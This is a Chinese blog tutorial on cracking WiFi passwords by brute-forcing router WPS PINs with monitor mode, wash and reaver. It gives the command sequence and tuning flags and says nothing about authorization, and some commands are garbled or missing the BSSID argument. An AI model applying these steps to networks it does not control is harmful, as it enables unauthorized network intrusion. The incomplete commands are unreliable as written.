大家好，又见面了，我是你们的朋友全栈君。

部分老版路由器有WPS或叫QSS功能，并且在默认开启状态时，可使用此工具。

PIN码共为8位，按4 3 1 分段，总共穷举有11000种组合。通过获取到PIN码，并记住Bssid和PIN，后期可以通过一条命令爆出无线密码。

容易碰到的问题：连接超时，卡住，路由自保护等。

reave的进度表文件保存在/usr/local/etc/reaver/MAC地址.wpc 或/etc/reaver/MAC地址.wpc

基本用法：

1、ifconfig //查看网络配置信息，网卡的模式和名称：常见为wlan0

2、airmon-ng start wlan0 //开启监听模式，此时网卡名变为 wlan0mon

3、wash -i wlan0mon //利用wash，查看开启WPS的无线路由器

4、airodump-ng wlan0mon //查看周边AP信息

5、reaver -i wlan0mon -b -vv //开始穷举PIN码

// -i：网卡名称；-b：Bssid即路由ID；-vv：显示更多的非严重警告

// -p：pin码；-S ：使用最小的DH key，可提高破解速度；

//另外，也可以给命令增加2个参数，延长PIN穷举和反馈的响应时间避免路由当机。

-d 即delay每穷举一次的闲置时间预设为1秒；-t 即timeout每次穷举等待反馈的最长时间

6、[reaver -i wlan0mon -b -vv -p xxxx] //从前4位PIN码开始

7、知道PIN码以后使用如下命令反算出wifi连接密码

reaver -i wlan0mon -b ‘s MAC -p PIN码

此方法受信号强度和WPS保护机置等影响，尝试过几次，均信号在-70左右，均连接超时。

参考链接：https://zhuanlan.zhihu.com/p/24803690

发布者：全栈程序员栈长，转载请注明出处：https://javaforall.cn/137877.html原文链接：https://javaforall.cn